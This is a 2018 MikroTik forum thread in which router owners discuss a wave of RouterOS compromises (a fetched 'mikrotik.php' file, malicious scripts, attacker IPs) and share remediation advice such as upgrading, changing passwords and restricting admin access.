Community discussions

 
User avatar
sjoram
Member Candidate
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Router compromised

Tue Jul 24, 2018 4:27 am

I found my RB750 crashing due to running out of RAM this evening.Upon deeper investigation, it appeared that unauthorised access had been obtained to the router. Some firewall "drop" rules were disabled and there was a "mikrotik.php" file along with some scripts running.

I found the php file rather quickly although it took a little longer to locate the scripts.

I have upgraded from 6.38.1 to 6.42.6 (I understand there were some patched vulnerabilities) and have changed user passwords. I initially changed these after removing the file/scripts but found there was still a job running after the firmware upgrade. I subsequently changed user passwords again and have not seen it re-appear since.

Other than ensuring I lock down access to any admin interfaces from remote networks (these were a little more open than they should have been), is there anything else I can look for to ensure that I have cleared all traces of this malicious activity?
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
infused
Member
Member
Posts: 305
Joined: Fri Dec 28, 2012 2:33 pm

Re: Router compromised

Tue Jul 24, 2018 4:32 am

Had the same issue today. Half our customers were compromised.
Last edited by infused on Tue Jul 24, 2018 4:51 am, edited 1 time in total.
 
User avatar
sjoram
Member Candidate
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 4:37 am

Ouch. Well "at least" it's not just me. I've spent 3 hours on it and it seems to have subsided - for now, at least.

Router has now been up 1h6m and the best it has otherwise managed in the past 3.5 hours was 15 mins.
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
User avatar
vecernik87
Long time Member
Long time Member
Posts: 642
Joined: Fri Nov 10, 2017 8:19 am

Re: Router compromised

Tue Jul 24, 2018 5:10 am

This is *not* fixed in the latest release. This is a new bug.
I am aware you removed this sentence. I just want to make sure - was it completely incorrect claim (ie new attack using old and fixed vulnerability) or is there even slight info suggesting, there might be another NEW vulnerability?

@sjoram: thanks for info! This might actually bring some light into another similar case.
 
infused
Member
Member
Posts: 305
Joined: Fri Dec 28, 2012 2:33 pm

Re: Router compromised

Tue Jul 24, 2018 7:09 am

This is *not* fixed in the latest release. This is a new bug.
I am aware you removed this sentence. I just want to make sure - was it completely incorrect claim (ie new attack using old and fixed vulnerability) or is there even slight info suggesting, there might be another NEW vulnerability?

@sjoram: thanks for info! This might actually bring some light into another similar case.
Well I thought it was, now I'm not so sure - but I cannot get any clarification.

We had routers on most firmwares affected. But if it is a compromised userlist which has been used from previous months to attempt to login via winbox, then this would explain it.

So many devices were hacked though I really don't know.

Both cases look identical.
 
AlekseyMansurov
just joined
Posts: 2
Joined: Tue Jul 24, 2018 7:13 am
Location: Russia, Yekaterinburg

Re: Router compromised

Tue Jul 24, 2018 7:17 am

Hello.
My routerboard is hacked two days in a row, every time i rolling back and now i turned off all services except winbox and firewalled it (access from src.adr.list). Will wait.
First time i thought, that my password was hacked or keylogged, but now i see, that a lot of customers affected.
 
AlekseyMansurov
just joined
Posts: 2
Joined: Tue Jul 24, 2018 7:13 am
Location: Russia, Yekaterinburg

Re: Router compromised

Tue Jul 24, 2018 8:19 am

Seems that case is a vulnerability solved at 6.42.1 update. I used 6.41.2 and my router got hacked, after reading that topic i updated (now) viewtopic.php?f=2&t=137147
 
bfka
just joined
Posts: 1
Joined: Tue Jul 24, 2018 9:10 am

Re: Router compromised

Tue Jul 24, 2018 9:16 am

There was a breach earlier /maybe month ago or so/ and I've changed name of admin account and disable it, create another user with full access, upgrade firmware's /both/ and...the new username was used to access two of my routers. IP address of mikrotik.php script /empty/ was - 95.154.216.164
 
User avatar
inteq
Member Candidate
Member Candidate
Posts: 101
Joined: Wed Feb 25, 2015 8:15 pm

Re: Router compromised

Tue Jul 24, 2018 10:05 am

Got at least one MT hacked also from 95.154.216.151 and mikrotik.php (empty it seems) uploaded.
 
User avatar
vecernik87
Long time Member
Long time Member
Posts: 642
Joined: Fri Nov 10, 2017 8:19 am

Re: Router compromised

Tue Jul 24, 2018 10:57 am

the "mikrotik.php" is actually not uploaded file. It is downloaded using "fetch" but not deleted. Be glad that those hackers do this silly mistake again and again so we can easily notice that something is wrong.
The fetch has probably two purposes. Firstly it gives remote server notification, that device is hacked and ready to receive commands and secondly if fetched file contain some commands, it may be executed (so attacker actually does not need any remote access - any extra username or changed password, which would show that device is hacked.
 
User avatar
sjoram
Member Candidate
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 10:59 am

Fortunately, I have the logs from my device being captured via syslog.

I am just trawling through these (1700 so far) and appear to have seen the first sign last night of when I noticed problems. This shows a SUCCESSFUL winbox login, followed by SOCKS config changes and scripts being added/removed.

However I can see entries in the logs from much earlier showing mikrotik.php being downloaded repeatedly.

I can find traces back as far as 21st relating to successful winbox logins also showing SOCKS/script changes that were not made during a genuine admin session.

I'm at 4550 syslog entries so far but will keep checking back for more.

I note that a possible exploit was to gain root access via telnet and load a script into flash to run on every boot. I observed after the firmware update/password change that a "job" was still running under scripts, but no script itself was showing, as was the case prior to firmware upgrade. I've not rebooted again since to see if this behaviour returns on next boot, but need to check this as I'm concerned the device may still be compromised. Any ideas?
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
User avatar
sjoram
Member Candidate
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 11:00 am

Whilst I am disappointed in myself that I have not 'hardened' my router(s) as well as I should have done in order to mitigate this type of attack, it has always been a concern to me that RouterOS seems to be quite so insecure 'out of the box' - should we not be striving to be secure by default?
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24059
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Router compromised

Tue Jul 24, 2018 11:02 am

By default, the internet port is protected and doesn't allow any type of access. If you do not trust your LAN, you should make your own rules, that is true.
No answer to your question? How to write posts
 
User avatar
sjoram
Member Candidate
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 11:14 am

There was a breach earlier /maybe month ago or so/ and I've changed name of admin account and disable it, create another user with full access, upgrade firmware's /both/ and...the new username was used to access two of my routers. IP address of mikrotik.php script /empty/ was - 95.154.216.164
Did you change your user/password AFTER the firmware upgrade? I also changed *before* but clearly those were also being compromised. So far, since changing *after* the upgrade, I've seen no further successful attempts.
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
pe1chl
Forum Guru
Forum Guru
Posts: 5545
Joined: Mon Jun 08, 2015 12:09 pm

Re: Router compromised

Tue Jul 24, 2018 11:42 am

Whilst I am disappointed in myself that I have not 'hardened' my router(s) as well as I should have done in order to mitigate this type of attack, it has always been a concern to me that RouterOS seems to be quite so insecure 'out of the box' - should we not be striving to be secure by default?
When you are concerned about security, why did you not upgrade RouterOS for so long and not even after vulnerabilities have been found and patched?
There really is no excuse for running 6.38.1 on a visible device...
But indeed, as Normis also writes, you should not expose the admin interface to internet and also not to your local network when you have thousands
of subscribers there.
The default firewall protects from internet-side access but in your case it could be a good idea to reset to defaults and reconfigure as the default firewall
has improved but a firmware upgrade does not install the new default settings, it just keeps your existing settings which were generated from an old default.
 
User avatar
sjoram
Member Candidate
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Tue Jul 24, 2018 12:45 pm

Whilst I am disappointed in myself that I have not 'hardened' my router(s) as well as I should have done in order to mitigate this type of attack, it has always been a concern to me that RouterOS seems to be quite so insecure 'out of the box' - should we not be striving to be secure by default?
When you are concerned about security, why did you not upgrade RouterOS for so long and not even after vulnerabilities have been found and patched?
There really is no excuse for running 6.38.1 on a visible device...
But indeed, as Normis also writes, you should not expose the admin interface to internet and also not to your local network when you have thousands
of subscribers there.
The default firewall protects from internet-side access but in your case it could be a good idea to reset to defaults and reconfigure as the default firewall
has improved but a firmware upgrade does not install the new default settings, it just keeps your existing settings which were generated from an old default.
You make a fair point regards not upgrading. I notice there is an RSS link on the download page on the web - it would be useful if there was some other method (email?) of notification when there are new releases/changelog.

This is on a home network so there are not "thousands" of subscribers on my LAN side, though I understand there may be for others.

It would appear that some of the default drop rules have been negated due to mis-configuration, which I will get fixed.

There have been a few other issues of functionality I've had of late with ROS, so I'm looking to spin up and explore an instance of an alternative platform.
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
yottabit
Member Candidate
Member Candidate
Posts: 160
Joined: Thu Feb 21, 2013 5:56 am

Re: Router compromised

Tue Jul 24, 2018 3:11 pm

You can sign up for email notifications from Mikrotik. I also follow Mikrotik's Twitter account and a non-Mikrotik Twitter account for release notices.

There's a subscription field at the bottom of the downloads page: https://mikrotik.com/download

Twitters: @mikrotik_com, @mikrotik_build

Sent from my Pixel XL using Tapatalk

 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24059
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Router compromised

Tue Jul 24, 2018 3:12 pm

https://blog.mikrotik.com now will have security announcements, it also has RSS feed for the specific "security" category.
No answer to your question? How to write posts
 
User avatar
genesispro
Member Candidate
Member Candidate
Posts: 126
Joined: Fri Mar 14, 2014 12:33 pm

Re: Router compromised

Wed Jul 25, 2018 10:01 pm

I also got it and telnet,ssh,www service where disabled
even to version 6.41.3
which version is affected and how is it injected?
 
User avatar
sjoram
Member Candidate
Member Candidate
Topic Author
Posts: 102
Joined: Sun Feb 10, 2013 8:47 pm
Location: Essex, UK

Re: Router compromised

Wed Jul 25, 2018 10:12 pm

I believe mine may have been this:
http://www.networkinghowtos.com/howto/m ... x-service/

I have seen another post (which I will not reproduce here) detailing the exact steps required to perform the exploit. This leads me to believe my device may still be compromised as the attacker would have gained root access to the operating system and injected some code to run at every boot. I have killed the script set in scheduler to run on every boot, however my device has not been rebooted since the firmware upgrade.

I have a backup and I am planning to run a netinstall to format the flash and reinstall ROS as soon as I can get physical access to the device, probably at the weekend.
RouterBOARD RB750 - Xilo ADSL2+ (Annex M)
RouterBOARD RB750GL - Xilo FTTC (VDSL)
 
darkmanlv
just joined
Posts: 24
Joined: Thu Mar 26, 2015 3:19 pm
Location: Riga, Latvia
Contact:

Re: Router compromised

Wed Jul 25, 2018 11:27 pm

found same today, version was 6.39 and also added this script with 95.154.216.164, changed pass, updated routerboard and routeros :)
 
User avatar
normis
MikroTik Support
MikroTik Support
Posts: 24059
Joined: Fri May 28, 2004 11:04 am
Location: Riga, Latvia

Re: Router compromised  [SOLVED]

Thu Jul 26, 2018 7:58 am

I believe mine may have been this:
http://www.networkinghowtos.com/howto/m ... x-service/
Like I said, this was fixed in April. We are not joking, when we suggest to keep your router up to date. And change the passwords once in a while, after upgrading.

Full details https://blog.mikrotik.com
No answer to your question? How to write posts

Who is online

Users browsing this forum: No registered users and 59 guests